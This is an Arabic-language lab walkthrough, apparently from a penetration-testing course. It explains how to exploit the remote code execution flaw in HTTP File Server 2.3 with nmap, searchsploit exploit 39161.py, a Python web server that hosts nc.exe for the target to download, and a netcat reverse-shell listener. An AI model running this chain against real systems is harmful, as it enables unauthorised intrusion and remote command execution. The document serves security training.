✨ المختبر 6: استغلال HTTP File Server 2.3 يدوياً

🎯 الهدف الأساسي: استغلال ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في HTTP File Server 2.3 يدوياً للحصول على صدفة أوامر (Command Shell) باستخدام Netcat.

🔧 الأدوات المستخدمة:

  • Nmap

  • SearchSploit

  • Python (لتشغيل كود الاستغلال)

  • Netcat (NC)

  • HTTP Server (Python)

📜 خطوات التنفيذ:

1. تحديد عنوان IP للهدف: 🗣️ لو كنت في بيئة Black-Box، فسوف تحتاج لتحديد عنوان IP للهدف.

2. فحص المنافذ وتحديد الخدمة الضعيفة (HTTP File Server 2.3): 🗣️ لفحص المنافذ وتحديد خدمة خادم الويب HTTP File Server 2.3 على المنفذ 80، فسوف تستخدم Nmap. bash nmap -sV [عنوان IP الهدف] 🔗 ربط سلسلة الأدوات: تحديد الإصدار (2.3) هو مفتاح البحث عن الاستغلالات المناسبة.

3. البحث عن استغلال لـ HTTP File Server 2.3: 🗣️ بعد تحديد الخدمة الضعيفة، فسوف تستخدم SearchSploit للعثور على كود استغلال مناسب.

  • تحديث SearchSploit (مهم جداً): 🗣️ يجب تحديث قاعدة بيانات SearchSploit بانتظام لضمان الحصول على أحدث الاستغلالات.

    searchsploit -u
  • البحث عن الاستغلال:

    searchsploit "HTTP File Server 2.3"

    🔗 ربط سلسلة الأدوات: نتائج SearchSploit ستوفر معرف EDB واسم ملف الاستغلال الذي ستقوم بنسخه وتعديله.

4. نسخ وتعديل كود الاستغلال: 🗣️ بعد العثور على الاستغلال، فسوف تقوم بنسخ كود الاستغلال إلى مجلد العمل الحالي.

  • نسخ الاستغلال:

    searchsploit -m [معرف EDB للاستغلال]
    # مثال: searchsploit -m 39161.py
  • تعديل الاستغلال: 🗣️ يجب فتح ملف الاستغلال (عادةً بصيغة Python) وتعديل خيارات مثل عنوان IP للمهاجم (LHOST) ومنفذ الاستماع (LPORT). تأكد أيضاً من مسار netcat.exe الذي سيتم تنزيله.

    # افتح ملف الاستغلال (مثال: nano 39161.py)
    # ابحث عن المتغيرات LHOST و LPORT و NC_PATH وقم بتعديلها لتناسب بيئتك.
    # LHOST = "عنوان IP الخاص بـ Kali"
    # LPORT = 1234
    # NC_PATH = "nc.exe" # إذا كان nc.exe سيتم تنزيله بنفس الاسم

5. استضافة nc.exe على Kali Linux: 🗣️ يجب استضافة ملف nc.exe على خادم ويب بسيط على Kali Linux، حتى يتمكن الهدف من تنزيله كجزء من عملية الاستغلال.

  • نسخ nc.exe إلى مجلد العمل:

  • تشغيل خادم HTTP:

    🔗 ربط سلسلة الأدوات: خادم HTTP سيجعل nc.exe متاحاً للتنزيل من قبل الهدف.

6. إعداد مستمع Netcat على Kali Linux: 🗣️ يجب تشغيل مستمع Netcat على Kali Linux لاستقبال الاتصال العكسي (Reverse Shell) من الهدف. bash nc -nvlp 1234

7. تنفيذ الاستغلال: 🗣️ بعد إعداد كل شيء، فسوف تقوم بتنفيذ كود الاستغلال. bash python3 39161.py [عنوان IP الهدف] 80 🔗 ربط سلسلة الأدوات: إذا نجح الاستغلال، فسوف تحصل على صدفة أوامر (CMD Shell) على مستمع Netcat الخاص بك.

نقاط التحقق:

  • تم تحديد عنوان IP للهدف.

  • تم تحديد الخدمة الضعيفة (HTTP File Server 2.3).

  • تم العثور على كود الاستغلال ونسخه وتعديله.

  • تم استضافة nc.exe على خادم HTTP.

  • تم إعداد مستمع Netcat.

  • تم تنفيذ الاستغلال بنجاح، وتم الحصول على صدفة أوامر على نظام Windows.

Last updated